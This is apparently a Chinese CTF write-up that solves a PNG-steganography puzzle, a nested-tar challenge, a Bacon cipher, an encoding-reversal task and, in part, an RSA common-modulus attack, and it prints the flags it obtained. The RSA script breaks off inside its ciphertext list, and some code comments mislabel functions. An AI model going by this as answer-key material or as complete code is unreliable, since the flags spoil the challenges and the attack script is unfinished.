From LB@10.0.0.55
Misc
0x01 misc100(图片隐写)
首先用binwalk扫了一下,发现没毛病。
然后就搜了一下jpg的文件尾FFD9,如下图,看到了png格式的标志IHDR。
于是将FFD9以前的部分删除,补全PNG文件头8950 4e47 0d0a 1a0a得到一张新的图片,看上去是全白的,毫无内容。但是打开提示图片出错,于是想到是宽高和CRC不匹配导致的。
分析一波png格式可以知道,
CRC = 0x9A768270,width = 0x0320,height = 0x012C
爆破高度,脚本如下:
# -*- coding: utf-8 -*-
import binascii
import struct
#x49x48x44x52x00x00x03x20x00x00x01x2Cx08x06x00x00x00
crc32key = 0x9A768270
width = 'x00x00x03x20'
for i in range(256, 65535):
height = struct.pack('>i', i)
#CRC: 9A768270
data = 'x49x48x44x52' + width + height + 'x08x06x00x00x00'
crc32result = binascii.crc32(data) & 0xffffffff
if crc32result == crc32key:
print ''.join(map(lambda c: "%02X" % ord(c), height))
得到高度为0x0258,修改得到flag{python&C_master_can_be_my_girlfriend}。
0x02 misc200(python解压)
一看题目描述就知道是要解压800次压缩包,一开始给的文件是Gzip格式,但之后的都是tar,所以为了方便手动解压一次,然后脚本解压。
# -*- coding:utf-8 -*-
__Author__ = "LB@10.0.0.55"
import tarfile
dstPath = ''
tar = tarfile.open("800.tar","r")
now = tar.getnames()[0]
tar.extractall(dstPath)
while now != 'flag':
tar = tarfile.open(now,"r")
now = tar.getnames()[0]
tar.extractall(dstPath)
得到flag{for_i_in_{800..0};do_tar_xzvf_$i;done_&&_cat_flag}
Crypto
0x03 crypto100(bacon密码)
首先看到佛曰于是到该网站解密http://keyfc.net/bbs/tools/tudoucode.aspx
得到js颜文字,试了好几个浏览器的console都不太好使,最后用的360。
得到好多flag(滑稽),将Flag转为1,flag转为0,发现字符串长度为85,是5的倍数,在M4x学长的提示知道是bacon密码,将1转为a,0转为b解密。
附上脚本
#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
import re
alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
first_cipher = ["aaaaa","aaaab","aaaba","aaabb","aabaa","aabab","aabba","aabbb","abaaa","abaab","ababa","ababb","abbaa","abbab","abbba","abbbb","baaaa","baaab","baaba","baabb","babaa","babab","babba","babbb","bbaaa","bbaab"]
second_cipher = ["aaaaa","aaaab","aaaba","aaabb","aabaa","aabab","aabba","aabbb","abaaa","abaaa","abaab","ababa","ababb","abbaa","abbab","abbba","abbbb","baaaa","baaab","baaba","baabb","baabb","babaa","babab","babba","babbb"]
def encode():
string = raw_input("please input string to encode:
")
e_string1 = ""
e_string2 = ""
for index in string:
for i in range(0,26):
if index == alphabet[i]:
e_string1 += first_cipher[i]
e_string2 += second_cipher[i]
break
print "first encode method result is:
"+e_string1
print "second encode method result is:
"+e_string2
return
def decode():
e_string = raw_input("please input string to decode:
")
e_array = re.findall(".{5}",e_string)
d_string1 = ""
d_string2 = ""
for index in e_array:
for i in range(0,26):
if index == first_cipher[i]:
d_string1 += alphabet[i]
if index == second_cipher[i]:
d_string2 += alphabet[i]
print "first decode method result is:
"+d_string1
print "second decode method result is:
"+d_string2
return
if __name__ == '__main__':
while True:
print " *******Bacon Encode_Decode System*******"
print "input should be lowercase,cipher just include a b"
print "1.encode
2.decode
3.exit"
s_number = raw_input("please input number to choose
")
if s_number == "1":
encode()
raw_input()
elif s_number == "2":
decode()
raw_input()
elif s_number == "3":
break
else:
continue
得到flag{interestingcoding}
0x04 crypto200
这题就是把flag经过四个函数加密,并且每一次把要加密的函数的序号告诉你,让你逆回去,附上脚本。
#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
import random
import string
'''大小写字母前后颠倒'''
def rot13(s):
return s.translate(string.maketrans(
string.uppercase[13:] + string.uppercase[:13] +
string.lowercase[13:] + string.lowercase[:13],
string.uppercase + string.lowercase))
'''base64编码'''
def base64(s):
return ''.join(s.decode('base64').split())
def hex(s):
return s.decode('hex')
'''大写转小写,小写转大写'''
def upsidedown(s):
return s.translate(string.maketrans(
string.lowercase + string.uppercase,
string.uppercase + string.lowercase))
flag = open('flag1.txt','r').read() # try to recover flag
E = (rot13, base64, hex, upsidedown)
while flag[0:4] != 'FLAG':
print flag[0]
flag = E[int(flag[0])](flag[1:])
print flag
#FLAG{KEEP CLAM AND DECODE!}
0x05 crypto300
这是我入坑CTF搞的第一道RSA,abo居然就弄这么难....
这题的加密简单来说就是 c = pow( flag , e , n )
每次的c和e都不同,但n是固定的,这是关键。熟悉rsa的就知道是共模攻击。
脚本如下:
#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
from libnum import n2s
import sys
sys.setrecursionlimit(1000000)
e = [1619455979,
2218655053,
2835180841,
3071798573,
3875439793,
361506967,
1578333451,
2921677883,
3932969143,
364263283,
3513149351,
3517079837,
696665539,
3335742701,
3157525687,
1113728801,
3628966093,
2111846309,
3650543653,
2507103857,
2151201433,
2470127773,
4167499013,
2990751161,
734964331,
3662407867,
2133375229,
4283967859,
3533655011,
1930522169,
1808434097,
786604957]
c = [
198715253333205140309304762885934618229717196308890027603141480980731775107348360929691664611310937503978870900195082805430374783694030256080622016431713424487244772527324022843322914415619245021182421250854444440781360638422051666613839841944782322487338599765894102041338732574012668931813897325660246967869476602808909797162902701210216869359928429288791785452635316367779426533481308013371557355393449986658731108747490355528775172926959308658280174940152832432165736439293418874425734751782857925497662265002591513393372683454767087602379380052747936562618483274958688907439693149445829031530613277130701096166928779898938460841793137793772824993304228003993183930879792632492470483669825399423456797908143494111020418710988346835166212243585055863746810963626606308385913688254166416633006118130890757463652637792926528161963258064305876815498055545713830360972308419832086946998782649756845607923863281939402203454937273620038072346575381808812583095514453536737347381024233365706099989443504975149420539758813461360142987773976973719344200937932368445461807527624932180387123416910068146569630371506530698264164327834638083283167886159722591510801422331956288691109442923649046533833838586468844563801643083794278525900495947,
32615591258153885532872120460212758736134886243634813235838462055254224230156978893837241333503438837560049738811019202053666852131843579969180819135918195670435646218798338878207884486439776440812589158659112670496432433764763703282993219460450070048880305140176623143541011577825923740021624574565959168129714857503384053650796471388783129123266822191328460622571825254797074278766744344449029921455396794262946102099484014268317736955668932589922820688481421252093330569923330793746274040977414382575142010484625274440120609641303636387828213766610186034348128287594747333041518241387255743495671694388224092241334375557960221929639377746330303476364413655641985978548904603860853957255975864881413562849205221262023878345647011166440806961597198047675599204037404256459922199686158595442710782206991869971191718158251760051098349825060204755675763053569921776142673198989292051093877623107211494156101936560510747801392150211993816788481683949289424910933680711155718999443532741102445391520053539886559539610597786096127192494164164228518358927737684861597150859018781114135430259903665470055196431935820328527509699402240720477154140845753960909980044365171108581262312383752579303617377411202139764854951147676135169489302612,
66331348462686153250296695781759893840540082106431060688642166094920963054454386160909285024693708709180659447308811827207322973517069483891841524064568481696886276602110235756792535972640546550591663958788184831942955818775909915874563107859430209106226964836934030904395159115382465970234941199704819769640593762900413821738787593211862509244398013371277195099352481162860270665271654630361508369774348131367993467425030998160169587216157673761775547713241287877763236621619305350738327144779326468027949822827736957625924651892195159587886802300412318572066585449435186835958137427957072632753488064046044798305510056751900532540381984196188284272484703780296921752859005241779484177257625857724661788303985408659574882200738498812640123589414846620878187851627040332985988217857334444229747101116835546587387529058387175918981369630513582381313981025132667377661996347958584608414104277777302587522043029635312231205555223913452993688170151119170674621210807817504509886723589614037415863900123614532263258892855353325308346912459808465192833936139455853486029976809048738520109306380728782094112390477509687496884677499629470529566827202707607848230794504633198690328201945268284346523454710734309082838305207763348401424238509,
164004163446008089666718192137031817359850277255766982325787647037345948365203976798637842311512464863832906111905990623949817253940409986984951112767032808318393752234041361036838124761423267335784301252250962536689187346813831041022690263185374961035003945149175972938252080480270680193265017609290011924525370595009605467668214164663421327613908679225941571789761138475288685059169731989145533584891528093887786774822746317153981394811634900993706425222431188320062252315542545334453105122231156084343442822838892689123465149586724439206092885935318016639894486157345294295148254853574855635676004303932911256592084480039592267380784991320280314496529203522239789775885043400410844243832986484636238813081350124096050697286264946684135121310120035868794250170852281104112576732912335380194647437945159468639523052796880927916652199668921197221184709945108069959143340391045094329297902707017172245831262183585571921493635549944298566190339579746362622700442052234720301103954999391788078836080909862222317350564301530732293346191963249511710072105503974619883584325246801156050757765262314256649373555369425025832209804598674362824927940241242152600281266717285915149400960059865054140490833118788728211569894674181393036838662875,
45947960368739558208097493897625666406633828759236085666167128694351187102101812420798311480694448160784477764614666102960096253523909779612898944660506642548489336785384765426051470250412672234226935918860589884055859767785524582180227176073546719310433965344821800284543451669281085954579291207714656197314046909588738052170283946327337113276958948898063545911683585561861302907298943619147055181740897995047558573871089748979886754257725528392778596105329761947544528644945129354031014613215305127062993261593496058003235713102885070715811321931665088377167055259977970265510670288183138173964424609912356657806070181228625941519268324110771702105106362587314167901665479477518591875398263727739793665536157373778040769289142530185779538757468804210316078378905303751850938985363358903828024860357603965981293337257369461111208473603446991946306037371320307876827740243011775806693028758616187294179449918997202266105617313062057606633200377759983936855402445899061576947808212483912488374175250969994073880803511846693616863973520692005851822171714638819207800641058501427213577483125133760937020028649876466638159277508377195781127462225538527920401092407877686318950049498560362743264958089197976688365662494303276857287168119,
125356092357877706662890375789247889669578918772140188510294251184770437003787488467595002202059712537946931856311779752934636910015638843793172809755851298956301887259898984497441797450426575641649222569223654927347219044685751484661683163573804529741514926672844330121233800053065064457870686352277216580000951594081199590208346872559615281302351288617853830576904062336628369777575347245887385257515011600976082606608983590091188944101135002119771175159086078912498016037595830122306918624403482241196025009087193892418672815641704807998904332180246158221638180467386385083906546337519343203946612180983042890996720084800461839064529501322421729525787193475935973003893884203795548039033099154281414097679288383366574581948757444266682014579917377740918920008627554825802967371974709787606487041345643990465351248803393702066685612265001695946536255545313027715724876193563102061706081745538155698554624740789574796125009177116459349160726360590091750894253928936908870999161241577669952887206482518264382937705646233999248958177908025091623698057409751131183834050213187339506436023005072302566583836809210349652051963901130838447386499120053021545303376505082100284328095159966864528528141555670656237144471817981898233821593892,
113947585190013050204858639968671693506484067336222834050439344412234983918119868168010840734554753728185036261612987848502772644997800059159205207159229423379995979680377447006074354078488350321558466272998181614961796171604718136255658138919021871283869018473826998886825572913312937740189228070864387191038024266885770986448310955555656855480683963556364167374430841444821204671913908252858635013165707240160147743448468631778867705949485724254273925636764403374763294142186064093872368513451761059968338396708399686951542264351568518376151357627488373380798017398608408511197595649889791196154271553115020249999283686802826932918287532157880899468242790662705099105268686730883800943468903974958267639291146598374627529067159039123402736433967730134409673511156624440096009158059377110097327193924987641316945975645260656977347657073468592006953287005071713408262272027904451749297996431138727856073711169242796937956169003357749813924000509885061674144553770081647386376399926223811996841666771949894170172577599193438447379795354140681289148657382143157540998161025008699580737935977205487224784562054202117233338934037374848570382264843757903986774530172104010903127322627994917241441677326799470264604563991487873632326302069,
80942726005728824895215139113781083664968065596375683537740325568270790305771030979949867969906789229629111681235505930148352932691846429820238691119750789922770189770332413311587297774591957339297276565654210664946307066700933111957642953819634082628772905457015617842988864089659612675074789406389532024617344863925192930665318392468183789658736773488242038712642020924560955678195301266308298388738483906824695769718038726429861476138752015103729553608430087736188299144703289939649895950515761300598105216355133561520282622999887606372705298510403505634121779157210198349273610042792916836503579659629319307123979066107694342081265079809795430752656711272311095826048229251480801188222464003350293060931742028851046247734460021990902239121120703336762580663375951558984614980452686667329216303523199509601743326384074459941786246326417937108386541781330566066886872107846942880200988048881633524680894252100758417934873383671789036332801657881546676971187457537916512681046084389834581780466227847451980265245145281895832533992037561457139473816329200369083114323009699037221052530293515624844108347260372993401849388853134122676211888008496411856021147982279818973569279701644160381544518890795806992080917984283873837126824144,
214748964286081035209411922643372327059725202349732347399245534665110970554122029079012633932218861152187326634432399580600269621940592363219574584018740126198736853091958272130277402229456891249531449094309041328811725296966900230831316294155864987505803737938165617599906622174592612149275576096457882836340204208563569762126081791976284395618556916423751000003673566127803559862024141373910377225212084919293025027358977244217142578601147139027270113463263706799566878136269767200198274930527850002155654375104801680834520836169527312439259226300331053451913678015795777404939938748959292457424659588265575850034351369258584740414184475935450540897753794827814119250635493864307724799256088346672846384482393789390288715550615607976872857474156027266279427030848957181405507039387719747982897529551684361468723983162067857797046622598902612792434860014566055707508089514218004436137530364340939803978979078874295280739477326324351701118236437238056552580727475388289553153608271034381372530723135731178949269451634303240511767113670311279951044780493946481740928681929901143828573923743240314176518678925316106072204398109417077086055467208756421034844564398559146179527125581063437361146615823627458558756122599449355201559716459,
241767495277528128900101000486652749275889274487422293823539248676245352452403118843705086804790362558275001263695258044820011116095887088914244354905676648429118435033479697310583629420333669388307208727678293951879971310206270160426330199950975467567756937926106693158186637811943779666758750105778389831356853455644253612370311686441901134864645474622263426284868902791525887618572059585671895947060021234289934249684722783138728198504449574920087015606865813260865753980751094016588431559561045991871494992295494879268157121270671455517042748098276406999454462454573066759845419070775113152069458040205165768555000122302500543039231566711349898790729753864006820332474775641710748209310873554989740340345861102092397037328725277064234954171925856974727577655871542481359705766810482029988204177984705799818799055378721673498470196963079490232257637980742372941622550634835211334846801748998073042254252317222919977848838631986042322872687293310918108856626422549269542154109857312131863286877767950306423659026533581807725394235957119243940800836289110410712850061875964834310808398889960044969086978294257062880851630511114755426539722553035806203297387011231104030171181888527653438030633976961778199162953343526700865027496929,
257714541961324534377184483181330678678033851719678331768515002293324425768734146175670787163377900936012597602325481153550536642559986044528022683810519287646551581731805922639833743871715994936998335959329613459272463658933196307889461290606551161600985202675134102289498798219962888012791247031648652187575001043335860468024202612628969707392671661597833233161593919667199861509442382102919656806077987736515357432320742052537365011107214491559691189433050599444530603391074154959168707082948967319656023205118935932043741421191017979168480048081248829943636741843243023932531267093388674908610789456766016952874442794461343818692035780915021763187145131426997361929114830921748841360074527343348229779141954682901255112635902934641373950219976042580261289414489940213576240104290544546582549426901916698496253079022698373844103622438767327397941926815642036561669728546312770635905334257868002546831925389380820430448690666403575048383615650283104367356008599331604262770418816661730181480718432284734060945494394168802317975174604779739968830616970026722022431879192931747360257655121344286299631744108849501049584548369301052524366425803814979602300567333169813926867117832041220602112126312630614846998281384526636317619412909,
152249616523673944635428579140531226322748190911364730659947231554448302792759165905461069966161487695925998907980796021147130836979302016252972502764580971887924209920025359074898246785467733810569293830398850124137963734004308132535880064054073778119571860176009539916074419969918961562452866463112848908579756633869799228099602378266621428871605624569336448076762877798889460161981269513371081026181922559581851089365263860867731283840262835498961708292504908601338494938544343080404811748388752868815189914087451719439944825419603628172205728717815378943874330622590435728574302733479328956934548803393266224358585130938195813317420478884586085609569474366402736149851941234240360275687122407054824215210807957032337427099025515370710666328408012041952757287235209496355444773656513614356525235025617398345798673805910780738340609957030127753371119975015410335999833913421796508144765254231359960355335432584291461066445329245736770065098761428216201281556690702076055428744344663697130322997858325934632044792031112417300122270216892692796363243327158672806252176738131619643525149266446681926753397993479994682822505999284810623387480486519656976350650053999001483603731774709540642044035868906426973762559839540670123648543321,
141885175017596305423500627645131575107786339430294645841534346393744970928547706148692598324774017276497208526670340110305600721376723243759252119199493174404588674152780412046411847521117800376368723498110209103411734829959471461413055468278849190880112033989214651317000032448566674630626798721680519404551470132164277463548332432127995584544884538825517140077397392086480903363569224142336996118730340350793968901023298056769525908004725165666875205057477819210713900168509758312779119574187306917568836150259971671505034524945960774159873730041165848998020306035458187413591835371279885988071087098065297253004014665792577814202292314106976221968792123914849966925326898180409125168387653055780850416783533388233794007206639924286508797719626199431224927173654819775635953363464347773437746211996773537308908812131219174505723379744294194604879171275955187982294896604822813307573007969106429840953270923696288671417674740665787604320134500882817682915062705221505532573463342311382309534511561119967273903762793292599949047123883106545864209213649853055775133470488753273747454692389699907818349846963686548006747272385678923090963702315374097599149288799035849189173538312615281590629524521735004123625275574683625257365982950,
84154887167663005564971781415759129131513858873266567263971478334826569906221816174499427438971791043203525474107296940206645812827609501080077255776567097532601998222050222148875378315854239048285144354965586440242520651397385647071959123975187982843234896331888071927552848904030360907011381338160421237078943629057451763949415151878243303312304391203521112830919050144693526351437402537315225585873983762377201070929715691206445183693561482420051400633076275020902523275446788011537262658326370350329119901078250330319218306184596621175065928588508868824102921884476165091160034096460299286154804217951151277564843695469142637818554254256136570700260353532588068560351375083518146438604538140378764050328633359886305506182537529136644867444717294397769407135355914142273651714101824922684567272429747662199568360433925137690726609600645635069518716837677156365887471244560124937152921479266520981831171952445727967566859213080826731388277694313996215356614344861161561916245990536687813179770116264707607047706265252468015484026195230528861464541729666902845284512495437306686898930223807983372129124542966125267141190292960089874990660191717704379851606294904470331435767235538293577922264523225637347689613509384255979791360328,
43055389645867477740739762219909717374008269061992587411227265348272388255749447180898051894820943724210765969852917478151709123919031197606763700822911593332251336820714196671920583693814086249584859041854277902573466436173027214554104290378462905100242892219394275533364666633602052047102375720514970222150140139000553769724412829526852464960929759188588751478464948388214841144095407422134552848930519820740902265441058958761380729756230183603969122778078738907961741909986257001829656399667355771459698511700536882279771089231822480723389262394354239417286522217825183211907921271269570560916522825496913680637173082670943738806325312558783781498239610980612503797072443469055008386663918663661425577342738124440147047973869745514096049151900127257965977246083283415040150114481770180292936219148181123964193073638615475870576701595250826690449247467453221879162608139855844190496319950953492864185640791968347838147106631307491855318809632587021819663942460606838296456987993010551501045897162435160998263122908197877464603213354510075978439509735779899968819938139403623408447867417188142815972772570731054570709025534770324415491896847680853280545722024225400812335839453618710312986137796093716534638332665783690053427565890,
300805093836775269687714503886981915047331069660583214592135776267153412860251701079014552949783015839994026725023945901193233727494210624818589847117536581710999780071379534892743515738612273915688354944651397406101711475051159370069791141899039713571959927605829292021618060760425597424540809999329444942512985990339176894237187132557571289556409102232853113375803550228683847087545839451041477658068909491612228696189919798922378874844769455077179800633860439931278246881321165479258496794490429805697196396398450535601405494300488051331171555842840985215614426735146395132410178484258687147636026156930025265764469768343393258010859496045917596198198115591415776149562040844700469706016570169733699363944167465350085127155184256404522483032691958571671728720863715635573475764348424981882707260910475502490345840937305158588731592680874307201487280234247426374006926927495825609714729756496731145678785460958862155753763832580790222717294512610179338310209465192019766121895084746597197481498308301770473709743958725196324730702041215569698219469796537186707814504900463205554828332215496060575292208125755751799206476791179940980890987519389524580753100591571821932319834517909828317799968182139456552228828118462241699682538215,
138315967799082319490296445952129246745563179189418354508841677229638259890233330923186435844871957862174167359229919039284304544801637241759134317927339498384323728740308391869882282641100164329833112544490531610162853039874075612367241941406708341643149155367734408705163357366835880193333024302260818331560724033336055415313740928715878224709282116887472441624628455603706235225795697510446794073701843132129403117265913442933436437027396730217511334527115106351270221401529179746478711184961651191253221699727142061801178430664040958771707494460181732232337953415828546198691707033313772894128162875464480105242199754920648127850370370003988060285111321590722417148423613545768902518122775532627057780140400783945009598520415975692393863347875587203844837496905934893503282323465118792962950189582770676792194101789778784292361424387343556640230203756522907496993072562753301134799557826032747054444287227100981033407580735717533650106269017913747941641876933259644822710522956983523717743814407698037421434020594767531390788894167855043325427253386448600253651599622076865992719336952996107347634527539570972074843886754329867171479781703702122686943181443610338727508255752277512516232067794521891591677203255878922590577353237,
233740741422103742385226886459472228257996327027200669233270229106694027300701973346021518474124745761420868645554975634347879683081785394721627695806659008928588139601813725687736133617243782809822596609914471421975648172306632894839761855967254363315375860181372798621867969637847935040991294541858402634237436676163462454024718224361512590244490522510528351778678346480402700382951123489117058006415772227637662064238950401445829597912585254301483855231554525892957401374245610620677843488579854377287384955459155069670703658051366458535713960439698347589006293972863845151913950434010522997164682113968952739054333618973511388158499125413572347339627042448286533263735202607800594477371262391885531210293044458197057524870357809728965699557382442675742298388001066404618489767251762157063568216350911330727475357473470623152086840758107385045257051648933616583481918254777353698564998862424758771401098688047151778063076790017466242066120712941066695402894021205835285013857338788028207389085253954073408554260403570973999806463657514170152348437729921947241986792747213414965359649966031309824090239867787947757540119014443189340701989844531311336614633354048249887870465299326511294175524764597920051931417047441603395093018730,
246719308520592920627179375352296892607680361443207528582582900762591061017974501868249196255624185244762399613671497549510936678927431914506367776509748817150579947091205723368545513742677870756111193095047255664855494883360146877395221609808360458422687252861069883311996346132372214020580594073309706578347503453196587092079136915964841230896137199650671638626176358849088414232492164299383500442885916251151073773948628843699243501954315568852309019787480212501753256664039981010518461028444336723439914906185060367524386546373667062142554924661637662889011728218902877432094787295339629030233821634494188419259269221673775348647066501174147709661479053932470613830638333644003572493313902736377595229262980073089519984432526465095278951230709076535730810997982093855902192543131555776749780036503208592070644540863433216189194449905863206000199298066699985225844781917772916059953902032900266549296226218867181670691338561484883575783381435525400710798233031365862795975646472599146414893847307530718013144263371927926831223871310153770086986628181751937606310418604742376058398134081723746654217631467890046688045928848019811885058274421241538036886400931421413404017493319900316044601954955303082294070896183674478977452117911,
236863212635899268903633391586192270281951404241719588100757586338939683662410080886308389789799677882451459489379049555637101929982486219286840856011920759656664168453863660294112292140838071766123673388992374383357275899207482318162595199866106874715386272208058403404274947340040493774946699254494078404435872070028495218945003096610859714423679025973424980511909296006604216006426909938802897596503312879672009150267131683390667424558114743694206626916260377603381906604849719318137499978797915632863997101675974326123323778492441347560169221617789817259580562728951447026765030318737288742675440350231882794749429834572275730182229309065713144401277110458972279318974236960532146982756393346063677110976795751213734037890386502942731572774272132376799787538870043053995033487015977641960731237296882704784058070134826109233192466203053918513775569191750609389729081103755988056143301137056795307917959693835438965971850434751702673748249826884718080134171022598394470504154822498919006347796730121120318612862366487897229260784579108714962151674232483170289175177377875379175343808063061650527670954592834476574490049808732500320171923286863419078067056882615659678515158055456567037992682772757835766697037290256319066632554220,
108974278939651092492893992673233385779984670314184711139312027264037404795462978337853017972491419588454990015915914688173437472379648582741152541457048843337162825145123822246313801899628596081757531355794108961215283609662532085830785592843935793063170175466335811356201149810220118808692473071471851758359938270315751869316276981818692143247018369451449271065422362681923519494324327423446124684149748126607147156578061248513346930496584118389514049044782348586806953140575243557814659264646177235934995402442686528005511537703747955567158901323507830302645588564433601757858589091770639094625194246846473955607899258941908024132433619382381054635975546735644595518048448831890142969670014496305316039659385903837672953095117049232247849804221598926984914967193068237200224939069428552020912255898593347461051310053072708916269940422440491461041468147301891353890852765051180075075065595639781085297576861876608918621807969748225162937380368062224303524840940402602064749293939448041847324815263141476675420833981900078706211045940321489041228048485919505215826304241790811663170805612121272474198904959089048701389166384392082371553096186983336424123329397769154170956973795635976381852189738982493742235569513623307309490410898,
195328676803092809563564100491672932855551241600172182720504832991482179312050217856517672760318377563436520304815204068904635000379741626239380230617418756995881649346496306969324454331544968901767813625431202856488192606168971829992182410145784596165058119685033694160726676086888209540381952189514446707929667629965129133533413606118245376172698580304587412334624733709106156644677458067759660637678438552462224245011754521090764767068945230686564139636823747903164205802357621670437287259198058975335759056232784674676356003035863991162144301743233735682247897989813359075379131003883145410450881318210835485963839229545925361751058953400868905637849198162572721754263772137419902248879371709338000872593256573787962557322557924614498692240954373463251407799536385188014807774418137730546086635753960034270574331540157782942227500775507797434670956459069871060425368581596885575824659437551725921753934336350715767263080562095286077028644522693098472679543264300298247272798356250912193224468763970680177754535774313196314029857112358922803782360816013106028307281783313150019420876364560453255982777291697216331281039621951935831889170899721217282555097537457431545700301763607940935983567635021643868458571860375807272471454884,
280922912080734476452288688229305464482874667438190141611617250002839700084428489452216395006745608276515631329821303821634158088260519177510304475344181100774620244949106352394485684487285130844449636034900004144662458588388432988547834244129826350278582584639612049923040468401691536388859851832447440096249205297493645828021704216299113799113996399135327470024540594906058983356257544082089173047513179628172164415162467371704287609571058874277277704655915690783219327002368836448869349867459347662686885188005469191581078212378028789732436236760473526242932283524827805726304535381448077435792951908974972640760481791374981080279210268425069355965043104714886295190832516339132193929267291414008595322731707642996989622791762973290913692436810777991034111668164351849144193892665967187306772157948197814843156732207065517336800076471601638418154790370592215507537489897060828118444643056950213752063782709015647652408051511169535102983113030487777297931625743150296135949748119416993438581000993619311412286594807628376834751822180152968417225875972363789543070415811568789022197213025467822222877784028972408025770407845572460257070036508569175645849025798374577174486000827333607013685733054710178468035258602460882493841991172,
119597610400986655822748572704247160378749552140098666928979665264352720818579965218203320626127860188751883851507578788065047673189983865835303769775101052499540654461042578201405519943996655527927432568654121760073883806453560861412045716194359736699664767884153078465566809833379155293675288703558671757572338310811999195499103033933734679490388916618604105253896846501640165766038127605992328516824323561115674741493527578312594272314928734192093252013744776261287377198018059078558877785775180939902670067435362751038547231529527427975202766312364429001266619686629513264874607760353705341075814117498519838829449186475803266347511493093314057394082489334887343697910896126310949379471459274042525273353403965336165896693907451549846915056438525918415860197888166717287251444261156004764238342963446234247692469498495955457564116860046366742203315665220665037378159590091437908369005410113691477805221553491636083039365118757769686187936678492833394541653919831671511456367239093688699015813189744150485962930092183879539404340397488297025103118503268756654960309659736211970446077705669626938922221364040400393261629370608819228139523239965135482093076186223217504520152284433685278728975596909313536355577774263112332303417495,
265574716051316652373725915733039581360767478007355677208862790546517266814175228876617557382345636366171230412704359342480196502313557124468742854845964639446615527297260078648078832479103552945529397702811023160856474548170758601177096109033782738037854491266583450360057709374656043727486579041008033644960633110898088737506337306079170039463060539284596680722984122668138506733044092213040264632377310912338859702542201713722801597383547642873074492695342282229531323404501606329685024697934105397704767634756177550830606943821292323641847550305418002116264481396685159729754699038021974112119007961857750927260165005343668997258556777073319104480913767351824955116406515961360656545696150590230824767818234392390066882108180249123134338522252881513320605843865719891943828694525610308593134095595257601277250095512971878092015641527416283394136605995411555481682062437646304056218813717773853653311982771914013794119770057681075974288994080040296298258197242260030794068770624750073528558655854468311973894900709010410153531963242536694053354460114740002987242912781569628039930451836710678384012266839237618091540990808712674561108617003652864432706686878854194926471413467364273879858306496164438558301944586872526314416436729,
257667709179960565944044186328492807367738944135954847043605212764382832704757417360761494394149259840075003740123177174052228149358818514203318778266531647701104357387731055756642198126158958674918656487262909369809914501090650615710024067892619098640605942423968925529478919228743137244828126157060713277649697565482870319712888771313525525182830544055741056836393661562890441668986775895006750523792997339303390948664379529154621139345761900668182063951765110476182353216412567939479399320617131606239757733838523720350373176371339447546395986226892159729052340263386251815711541426822349762794032005866548317927624214525949088057509495079716595991505466968675343424597967673057981998734607517767663217527777638265694675122968753070313353040479767444588078033182806074868813869650641232713145513611510749341250677135573366310245748508309797568504000893478018992172460072619223216653635059951104765676764262595981718889922618080559279031811463058767163081769501678854750143361230077375266855233524076932053758373299691299836495350858918208667028246552871796016959655328175575388893735202161506889843014300945258983774626428997566550594494105875649585794513909094813481276224437504997908838620440906093212995482890227864482686834190,
141579078248164659336314755581790903129574621785358563404942411832889027612518922843077970313356872708098314876455664277990196359617817343236077780212015726412928497676188115163774425127257561524759706739351055688734989106910467383489150219987041734129315089771609862587179278245998068815418125510778312870401717524959523295014404581149020609122748331349429079925933323418453487827441318667072736406784251846857542799307229563231965689979783481385754192295886669016685545205684049931676515786025123174165776550919656736011753349387875532858914921711407231535957028349182156745115357812608116460300955036029308789535332310917278417257879838400347134132981052282345463764939221065515453883650245991245545685969711331067221340811732118637757477963778774485295938537922318864147098619709636523127851393096174348180584740385495516284017265910448932749623752764252436217250309282113783674781819617117916630265873332129233493942838698537073854211679225599251713850721233668205932087328733513482266425252897096107405838046582457798073440382115284490583075914757656607262849908944027495332015319876753722106977136926354917615739139981712007899956187118822108254300985908728199221729789688355343771714240411144340267691701000569325726600849649,
100706408600125958616560572969447827645492723488680357656944023034538399739316039131511477608424396497504985240518087192341820691309156040173557865161644246030172330845283424397215880348164966399708147484312750461404633620074609510464879736103557969890573629561160496655513618078575574876229586969874915231783440308567697145631208720344817421966156995138024092630329839287981598622829909387496628107522882200612218007935276132288274430206492765043241442366305051357638881722993325504047488900922765366750296035408266424784898424797984918023953193141080617185404158286012068338980093238675383805104814208262220830765204980423273644054614406928753102312502957833868665255709495324999928347484830705882190875038302242159653038677668867695323597848591059767659509170440587343493256508581654455583570681313263289251311969820219946594908769937861909315550223427011196699072141411379931011418416261779511960573911524828019281347396350021592585079371291958989676277950146799107026783446505009215546211243848528990957997259499246021533330488818276943755176641351178947109131074473022313793500525109820926744484848784134455150133347892072036463192078208878984078430050509613362109163470776308853520413494134553520788527165210643113647810496589,
34981384963513076131815472417122245538702789105068221306406727134142930389099428734862694311891228943413212773580114035909562314727781382456014126977818591791289322161963910147483887147052734863940798811502259154628821952700508344620639373437401790884889282919618376779256551828163526573817923243825583451077106224979603217533158277439450241815036457407984580829814025545136980910922892003662836265953193789401675519824453471609823818847330469695357182000796330070038832658418239151887948372131409243514410202596006641703003800685022996642179931329903540845838747865543922540401107486050758928770312566891112859509042558439421819189496977968600766901852596844884584827569574626719419532811668716516566045998056095248077840438584050045411076171369092407022214298278762884213237055585696381071190037564171344508596607067261872983909821105836157242634728458025327055623584965336446710828322609239195998699220816907795139019191499619780142983355297036976617749892226678047108234595124205089865678969515847549155589234025623787336452042816526192405144678899068125774503480629327594356672643117594907235787375069550300836157431308302810943631514521871487875048253747113673958632796475832959056980579822649368226846879825974200976217747711,
188052094573847895353443320101089422934009131511529914800621614889788360489366471014123356068611198436697265642592293438705994280157306755884434062062555897511192911655239912153534425989299815208675196566032489735017173324076268762358113558056588800463694316565281293458626724990449052985584065412267469173963344249026868295925099424637989404141395171480552192659475169492358789922397020410091812256339808139462101037579234818856906786078038004664178348113440160944322490909275995079859736003538861596009947731545923593644074147368603681156913766728849710930897391029520805799170297886035901560720354328801121497942830908897754247093158260715205760336479187352697750548402948926497391262820687181715070225267242781902784881771464965393190091137489807008274170341235018754058708227100521968172472112614024139542148511672090369883055579159150483280047859702113107069145063822076366273741380409559992255810745696026776486789590172676214880183878484309493691587076438455831627777180085114681329695154592837738419276373038438057280459032389795579950086647929180500039243858004612454114104246030389853209524293515867117230877055093292994625394623641233130738307203919315766183207018528307978536002563526915382765707550766239470376319281766,
